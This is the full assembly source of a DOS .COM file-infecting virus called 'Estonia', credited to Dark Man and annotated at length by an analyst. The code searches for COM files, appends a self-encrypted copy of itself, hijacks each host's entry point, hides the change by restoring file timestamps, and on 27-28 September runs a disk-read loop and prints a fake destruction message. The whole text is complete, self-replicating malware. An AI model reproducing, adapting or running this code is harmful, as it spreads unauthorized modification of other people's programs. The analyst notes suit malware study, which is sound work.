; D A R K M A N
; Proudly Presents
; E S T O N I A
;
; Analyst notes (added on review):
;   Syntax : MASM/TASM (segment/assume/org, `offset`, `word ptr`, `dup(?)`),
;            not NASM.
;   Target : 16-bit DOS .COM image (org 100h). Appending infector of *.COM
;            files in the current directory (see `filespec` in the data area).
;   Layout : code..crypted-1      plaintext decryptor (never encrypted)
;            crypted..extracopy-1 stored encrypted in infected hosts
;            extracopy..          scratch area past the image: a second copy
;                                 of the virus is built here, then the private
;                                 DTA follows at dtaoffset.
;   Registers: BP holds the delta offset (load address minus the assembled
;            `offset virusid`); static references in the body are [bp+label].

psp             equ 100h                        ; COM load offset / PSP size

virussize       equ extracopy - code            ; bytes appended to each host (author: ~400)

cryptsize       equ extracopy - crypted - 01h   ; span covered by the chained add/sub cipher

dtaoffset       equ 02h * virussize + psp       ; private DTA after the image and its extra copy

filetime        equ dtaoffset + 16h             ; DTA: file time (FindFirst/FindNext layout)

filedate        equ dtaoffset + 18h             ; DTA: file date

filesize        equ dtaoffset + 1ah             ; DTA: file size (low word is what infect reads)

filename        equ dtaoffset + 1eh             ; DTA: ASCIZ file name

memsize         equ dtaoffset + 2bh             ; end of DTA; host must fit in 65535-memsize
estonia segment
assume cs:estonia,ds:estonia,es:estonia
org 100h                                        ; Origin of COM-file

; Entry point. An infected host starts with the same 5-byte shape as the
; `estoniacode` stub: a near CALL (E8 rel16) into the appended body followed
; by the two-byte marker 'ES' at offset 3. That marker is the static
; infection signature the infector itself tests before re-infecting.
code:
        call viruscode
virusid db 'ES'                                 ; Estonia Scan-ID
;-----------------------------------------------------------------------
; viruscode - delta-offset recovery and in-place decryption of the body.
; In:    return address of the CALL at `code` on the stack
; Out:   BP = delta offset; crypted..crypted+cryptsize is plaintext
; Clobb: AX, BX, CX, DX, SI, DI, DF (left set here, cleared at `crypted`)
;-----------------------------------------------------------------------
viruscode:
        pop bp                                  ; Load BP from stack
        sub bp,offset virusid                   ; BP = delta offset

        ; Generation zero (delta 0) is assembled unencrypted: skip the decryptor.
        or bp,bp                                ; BP = 0?
        je crypted                              ; Equal? Jump to crypted
        ; DF=1 so LODS/STOS walk backwards, undoing the forward running sum
        ; applied at `ennexttime`. Two passes mirror the two encryption passes.
        std                                     ; Set direction flag
        lea bx,[bp+crypted]                     ; BX = offset encrypted code
        mov cx,02h                              ; Transpose 2 times
        mov dx,cryptsize                        ; Decrypt 350 bytes
denexttime:
        push cx                                 ; Save CX at stack
        mov cx,dx                               ; CX = size of encrypted code
        mov di,bx
        add di,dx                               ; DI = offset of last encrypted code
        mov si,di                               ; SI = offset of last encrypted code
        lodsb                                   ; AL = last byte of region (still encrypted)
        sub [bx],al                             ; Subtract AL from first encrypt byte
denextbyte:
        lodsw                                   ; AL = byte[i-1], AH = byte[i]; SI -= 2
        sub ah,al                               ; byte[i] -= byte[i-1] (predecessor still encrypted)
        mov al,ah                               ; AL = decrypted byte
        stosb                                   ; Store a decrypted byte; DI -= 1
        inc si                                  ; Net SI -= 1 per iteration
        loop denextbyte
        pop cx                                  ; Load CX from stack
        loop denexttime
;-----------------------------------------------------------------------
; crypted - first byte of the encrypted region. Runs the date-triggered
; payload, otherwise falls into the infection routine at `dontsink`.
;-----------------------------------------------------------------------
crypted:
        cld                                     ; Clear direction flag
        ; Trigger: DOS Get Date (AH=2Ah) returns DH=month, DL=day. Fires only
        ; on 27 or 28 September of any year - the date to set when detonating
        ; this in a controlled environment.
        mov ah,2ah                              ; Get system date
        int 21h                                 ; Do it!
        cmp dx,091bh                            ; 27. September?
        jb dontsink                             ; Below? Jump to dontsink
        cmp dx,091ch                            ; 28. September?
        ja dontsink                             ; Above? Jump to dontsink

        ; Payload loop. Despite the "Destroy" wording, AH=2 is the BIOS
        ; read-sectors service (the author's own comment says "Read a track"):
        ; the loop only reads from drive numbers 0..24 (CX=19h gives 25
        ; iterations, not 26) and then prints a message claiming destruction.
        xor al,al                               ; Clear AL
        mov cx,19h                              ; Destroy drives A-Z
formattrack:
        push cx                                 ; Save CX at stack
        mov ah,2                                ; Read a track
        xor cx,cx                               ; Clear CX
        xor dh,dh                               ; Clear DH
        mov dl,al                               ; DL = drive number
        int 13h                                 ; Do it! (disk)
        inc al                                  ; Increase AL
        pop cx                                  ; Load CX from stack
        loop formattrack

        mov ah,09h                              ; Standard output string
        lea dx,message                          ; DX = offset of message
        int 21h                                 ; Do it!

        int 20h                                 ; Exit to DOS! (payload path never returns to the host)
;-----------------------------------------------------------------------
; dontsink - normal path: resize the program's memory block to 1000h
; paragraphs, point the DTA at the private area past both virus images,
; then search *.COM in the current directory. Every failure lands in
; virusexit, which hands control to the original host code.
;-----------------------------------------------------------------------
dontsink:
        mov ah,4ah                              ; Modify memory allocation
        mov bx,1000h                            ; 1000h paragraphs = 64 KiB block
        int 21h                                 ; Do it!
        jc virusexit                            ; Error? Jump to virusexit

        mov ah,1ah                              ; Set disk transfer address
        lea dx,[bp+dtaoffset]                   ; DX = offset of new DTA
        int 21h                                 ; Do it!

        mov ah,4eh                              ; Find first matching file
        mov cx,22h                              ; File attribute hidden+archive
        lea dx,[bp+filespec]                    ; DX = offset of filespec
findnext:
        ; Shared INT 21h for 4Eh (first) and 4Fh (next); closefile re-enters
        ; here with AH=4Fh, so the whole directory is processed in one run.
        int 21h                                 ; Do it!
        jnc infect                              ; No error? Jump to infect

;-----------------------------------------------------------------------
; virusexit - restore the default DTA (PSP:80h), copy the host's saved
; first 5 bytes back to PSP:100h and "return" there (push 100h / ret).
; In generation zero `realcode` still holds its default INT 20h, so the
; bare virus simply terminates.
;-----------------------------------------------------------------------
virusexit:
        mov ah,1ah                              ; Set disk transfer address
        mov dx,80h                              ; DX = offset of default DTA
        int 21h                                 ; Do it!

        mov di,100h                             ; DI = beginning of code
        lea si,[bp+realcode]                    ; SI = offset of realcode
        push di                                 ; Restore Instruction Pointer (IP)
        movsw                                   ; Move the real code to the beginning
        movsw                                   ; (5 bytes in total: 2 + 2 + 1)
        movsb
        ret                                     ; Return!
;-----------------------------------------------------------------------
; setfileinfo - write the victim's original date/time (saved in the DTA by
; FindFirst/FindNext) back to the handle in BX, so the modification is not
; visible as a changed timestamp. Then close and continue the search.
;-----------------------------------------------------------------------
setfileinfo:
        mov cx,[bp+filetime]                    ; CX = file time in DTA
        mov dx,[bp+filedate]                    ; DX = file date in DTA
        mov ax,5701h                            ; Set file date and time
        int 21h                                 ; Do it!
; closefile - also the bail-out target for every rejected candidate (open
; failed, size out of range, marker already present). On the open-failed
; path BX does not hold a handle for this file; the close is issued anyway.
closefile:
        mov ah,3eh                              ; Close file
        int 21h                                 ; Do it!
        mov ah,4fh                              ; Find next matching file
        jmp short findnext
;-----------------------------------------------------------------------
; infect - entered with the DTA describing one *.COM candidate.
; Builds the image to append in `extracopy` (a copy of code..extracopy-1),
; saves the host's first 5 bytes into that copy's `realcode`, rejects hosts
; that already carry the 'ES' marker, drops 4 timer-derived bytes into the
; copy's `cryptvalues`, encrypts the copy's body, appends it and overwrites
; the host entry with `estoniacode`. BX = file handle from the open onward.
;-----------------------------------------------------------------------
infect:
        mov cx,virussize                        ; Move 400 bytes
        lea di,[bp+extracopy]                   ; DI = offset of extracopy
        lea si,[bp+code]                        ; SI = offset of code
        rep movsb                               ; Create an extra copy of virus (DF=0 since `cld` at crypted)

        mov ax,3d02h                            ; Open file (read/write)
        lea dx,[bp+filename]                    ; DX = offset of filename in DTA
        int 21h                                 ; Do it!
        jc closefile                            ; Error? Jump to closefile
        xchg ax,bx                              ; BX = file handle

        ; Size window: at least 5 bytes (the stub must be readable/replaceable)
        ; and small enough that host + two virus images + DTA fit in 64K.
        mov ax,word ptr [bp+filesize]
        cmp ax,05h                              ; AX = 5? (AX < 5)
        jb closefile                            ; Less? Jump to closefile
        cmp ax,(65535-memsize)                  ; AX = 64432? (AX > 64432)
        ja closefile                            ; Greater? Jump to closefile

        ; Patch the rel16 of the E8 in `estoniacode`: the appended body begins
        ; at filesize, measured from the end of the 3-byte CALL (hence -3).
        sub ax,03h                              ; AX = offset of virus code
        mov [bp+offset estoniacode+01h],ax

        ; Read the host's first 5 bytes into the *copy's* realcode field
        ; (bp+virussize+realcode lies inside extracopy) so they travel with
        ; the appended image and virusexit can put them back.
        mov ah,3fh                              ; Read from file
        mov cx,05h                              ; Read 5 bytes
        lea dx,[bp+virussize+realcode]
        int 21h                                 ; Do it!

        ; Re-infection check: word at host offset 3 equals 'E','S' in file
        ; order ('SE' as a little-endian word immediate).
        cmp [bp+virussize+offset realcode+03h],'SE'
        je closefile                            ; Infected? Jump to closefile

        ; Per-infection variability: two words from I/O port 40h (PC timer
        ; channel 0) stored in the copy's `cryptvalues`. They are plain data
        ; inside the encrypted span, not a key - the decryptor never reads them.
        lea di,[bp+virussize+cryptvalues]
        in ax,40h                               ; AX = port 40h
        stosw                                   ; Store AX in crypt values
        in ax,40h                               ; AX = port 40h
        stosw                                   ; Store AX in crypt value

        ; Encryptor, mirror of `denexttime`: forward running sum,
        ; byte[i] += byte[i-1] (already encrypted), then byte[0] += last byte.
        ; Two passes. Works on the copy; the running image stays plaintext.
        push bx                                 ; Save BX at stack
        lea bx,[bp+virussize+crypted]
        mov cx,02h                              ; Transpose 2 times
        mov dx,cryptsize                        ; Encrypt 350 bytes
ennexttime:
        push cx                                 ; Save CX at stack
        mov cx,dx                               ; CX = size of plain code
        mov di,bx                               ; DI = offset of plain code
        mov si,bx                               ; SI = offset of plain code
        inc di                                  ; DI = BX+1: first byte written
ennextbyte:
        lodsw                                   ; AL = byte[i-1], AH = byte[i]
        add al,ah                               ; Add AH to AL
        stosb                                   ; Store a encrypted byte (byte[i] = AL)
        dec si                                  ; Net SI += 1 per iteration
        loop ennextbyte
        add [bx],al                             ; Add last encrypted byte to byte[0]
        pop cx                                  ; Load CX from stack
        loop ennexttime
        pop bx                                  ; Load BX from stack

        mov ax,4202h                            ; Move file pointer to the end
        xor cx,cx                               ; Clear CX
        cwd                                     ; DX = 0 (AX positive): CX:DX offset 0
        int 21h                                 ; Do it!

        mov ah,40h                              ; Write to file
        mov cx,virussize                        ; Write 400 bytes
        lea dx,[bp+extracopy]                   ; DX = offset of extracopy
        int 21h                                 ; Do it!
        ; Only bytes-written == requested counts; on a short write the host
        ; is left with a partial appendix but its entry point untouched.
        cmp ax,cx                               ; Disk full?
        jne infectdone                          ; Error? Jump to infectdone

        mov ax,4200h                            ; Move file pointer to the beginning
        xor cx,cx                               ; Clear CX
        cwd                                     ; Convert word to doubleword
        int 21h                                 ; Do it!

        ; Overwrite the host's first 5 bytes with E8 rel16 'E' 'S'.
        mov ah,40h                              ; Write to file
        mov cx,05h                              ; Write 5 bytes
        lea dx,[bp+estoniacode]                 ; DX = offset of estoniacode
        int 21h                                 ; Do it!
infectdone:
        jmp setfileinfo
; Data area. All of it lies inside the encrypted span (crypted..extracopy-1)
; of an infected file; the running image is always plaintext.
cryptvalues db 04h dup(?)                       ; Cryption values (4 timer-derived bytes, see infect)
; 5-byte stub written over host offset 0: E8 lo hi 'E' 'S'. The rel16 is
; patched by infect before the write; 'ES' at offset 3 is the marker.
estoniacode db 0e8h,00h,00h,'ES'                ; New code of infected file
; Host's saved first 5 bytes (filled by infect in the appended copy).
; Default INT 20h (0CDh,20h) plus 3 don't-care bytes, so generation zero
; simply exits when virusexit jumps here.
realcode db 0cdh,20h                            ; Real code of infected file
db 03h dup(?)
filespec db '*.COM',00h                         ; File specification
message db 'Your drives were '                  ; This message will be shown the
db 'on the Estonia...'                          ; 27 / 28. September and then the
db ' They DIDN''T sur'                          ; drives (A-Z) bootsector will
db 'vive!!!',0dh,0ah                            ; look like it is being destroyed!!!
db '$'
; extracopy - end of the image. The work area for the appended copy starts
; here (virussize bytes), followed by the private DTA at dtaoffset.
extracopy:
estonia ends
end code